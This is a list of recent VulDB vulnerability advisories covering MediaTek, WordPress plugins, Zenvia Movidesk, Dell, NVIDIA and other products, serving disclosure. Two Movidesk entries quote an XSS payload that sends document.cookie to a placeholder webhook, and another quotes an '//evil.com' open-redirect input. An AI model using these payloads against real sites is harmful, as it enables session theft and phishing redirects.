VulDB Recent Entries

A vulnerability has been found in MediaTek MT2737, MT6813, MT6835, MT6835T, MT6878, MT6878M, MT6879, MT6886, MT6895, MT6895TT, MT6896, MT6897, MT6899, MT6980, MT6980D, MT6983, MT6983T, MT6985, MT6985T, MT6989, MT6989T, MT6990, MT6991, MT8673, MT8676, MT8678, MT8795T, MT8798 and MT8863 NR16/NR17/NR17R and classified as critical. Affected by this vulnerability is an unknown functionality of the component Modem. The manipulation leads to out-of-bounds write. This vulnerability is known as CVE-2025-20634. The attack can be launched remotely. There is no exploit available. It is recommended to apply a patch to fix this issue.

A vulnerability, which was classified as critical, was found in MediaTek MT7603, MT7615, MT7622 and MT7915 up to 7.4.0.1. Affected is an unknown function of the component WLAN AP Driver. The manipulation leads to out-of-bounds write. This vulnerability is traded as CVE-2025-20633. It is possible to launch the attack remotely. There is no exploit available. It is recommended to apply a patch to fix this issue.

A vulnerability, which was classified as critical, has been found in MaxD Lightning Module 4.43 on OpenCart. This issue affects some unknown processing. The manipulation of the argument li_op/md leads to deserialization. The identification of this vulnerability is CVE-2025-0974. The attack may be initiated remotely. Furthermore, there is an exploit available.

A vulnerability classified as critical was found in CmsEasy 7.7.7.9. This vulnerability affects the function backAll_action in the library lib/admin/database_admin.php of the file /index.php?case=database&act=backAll&admin_dir=admin&site=default. The manipulation of the argument select[] leads to path traversal. This vulnerability was named CVE-2025-0973. The attack can be initiated remotely. Furthermore, there is an exploit available. The vendor was contacted early about this disclosure but did not respond in any way. The vendor was contacted early about this disclosure but did not respond in any way.

A vulnerability classified as problematic has been found in Zenvia Movidesk up to 25.01.22. This affects an unknown part of the component New Ticket Handler. The manipulation of the argument subject with the input <img src="x" onerror="this.src='https://YOUR-WEBHOOK-URL?c=' + document.cookie;"> leads to cross site scripting. This vulnerability is uniquely identified as CVE-2025-0972. It is possible to initiate the attack remotely. Furthermore, there is an exploit available. It is recommended to upgrade the affected component.

A vulnerability was found in Zenvia Movidesk up to 25.01.22. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /Account/EditProfile of the component Profile Editing. The manipulation of the argument username with the input <img src="x" onerror="this.src='https://YOUR-WEBHOOK-URL?c=' + document.cookie;"> leads to cross site scripting. This vulnerability is handled as CVE-2025-0971. The attack may be launched remotely. Furthermore, there is an exploit available. It is recommended to upgrade the affected component.

A vulnerability was found in Zenvia Movidesk up to 25.01.29.29c1a0aa07. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /Account/Login. The manipulation of the argument ReturnUrl with the input //evil.com as part of string leads to open redirect. This vulnerability is known as CVE-2025-0970. The attack can be launched remotely. Furthermore, there is an exploit available. It is recommended to upgrade the affected component.

A vulnerability was found in NVIDIA GPU Display Driver and vGPU software R535/R550/R560/R565/R570 on Windows/Linux. It has been classified as problematic. Affected is an unknown function of the component User-Mode. The manipulation leads to buffer access with incorrect length value. This vulnerability is traded as CVE-2024-0131. The attack needs to be approached locally. There is no exploit available.

A vulnerability was found in code-projects Chat System 1.0 and classified as critical. This issue affects some unknown processing of the file /user/add_chatroom.php. The manipulation of the argument chatname/chatpass leads to sql injection. The identification of this vulnerability is CVE-2025-0967. The attack may be initiated remotely. Furthermore, there is an exploit available.

A vulnerability has been found in wordplus Better Messages Plugin up to 2.6.9 on WordPress and classified as problematic. This vulnerability affects the function better_messages_live_chat_button of the component Shortcode Handler. The manipulation leads to cross site scripting. This vulnerability was named CVE-2024-13612. The attack can be initiated remotely. There is no exploit available.

A vulnerability, which was classified as critical, was found in vanquish WooCommerce Support Ticket System Plugin up to 17.8 on WordPress. This affects the function ajax_delete_message/ajax_get_customers_partial_list/ajax_get_admins_list. The manipulation leads to missing authorization. This vulnerability is uniquely identified as CVE-2024-13775. It is possible to initiate the attack remotely. There is no exploit available.

A vulnerability, which was classified as problematic, has been found in code-projects Job Recruitment 1.0. Affected by this issue is some unknown functionality of the file /_parse/load_job-details.php. The manipulation of the argument business_stream_name leads to cross site scripting. This vulnerability is handled as CVE-2025-0961. The attack may be launched remotely. Furthermore, there is an exploit available.

A vulnerability classified as problematic was found in Widget4Call Plugin up to 1.0.7 on WordPress. Affected by this vulnerability is an unknown functionality. The manipulation leads to cross site scripting. This vulnerability is known as CVE-2024-13099. The attack can be launched remotely. There is no exploit available.

A vulnerability classified as problematic has been found in Email Newsletter Plugin up to 1.1 on WordPress. Affected is an unknown function. The manipulation leads to cross site scripting. This vulnerability is traded as CVE-2024-13098. It is possible to launch the attack remotely. There is no exploit available.

A vulnerability was found in Responsive iframe Plugin up to 1.2.0 on WordPress. It has been rated as problematic. This issue affects some unknown processing of the component Block Option Handler. The manipulation leads to cross site scripting. The identification of this vulnerability is CVE-2024-12768. The attack may be initiated remotely. There is no exploit available.

A vulnerability was found in WP Finance Plugin up to 1.3.6 on WordPress. It has been declared as problematic. This vulnerability affects unknown code. The manipulation leads to cross-site request forgery. This vulnerability was named CVE-2024-13096. The attack can be initiated remotely. There is no exploit available.

A vulnerability was found in Dell PowerProtect DD up to 7.10.1.40/7.13.1.10/8.1.0.10. It has been classified as problematic. This affects an unknown part. The manipulation leads to path traversal: '\..\filename'. This vulnerability is uniquely identified as CVE-2024-51534. An attack has to be approached locally. There is no exploit available. It is recommended to upgrade the affected component.

A vulnerability was found in Dell PowerProtect DD up to 7.10.1.40/7.13.1.10/8.1.0.10 and classified as critical. Affected by this issue is some unknown functionality. The manipulation leads to insufficient granularity of access control. This vulnerability is handled as CVE-2024-53295. The attack needs to be approached locally. There is no exploit available. It is recommended to upgrade the affected component.

A vulnerability has been found in WP Finance Plugin up to 1.3.6 on WordPress and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to cross site scripting. This vulnerability is known as CVE-2024-13097. The attack can be launched remotely. There is no exploit available.

A vulnerability, which was classified as problematic, was found in aThemes Addons for Elementor Plugin up to 1.0.12 on WordPress. Affected is an unknown function of the component Image Accordion Widget. The manipulation leads to cross site scripting. This vulnerability is traded as CVE-2024-13547. It is possible to launch the attack remotely. There is no exploit available.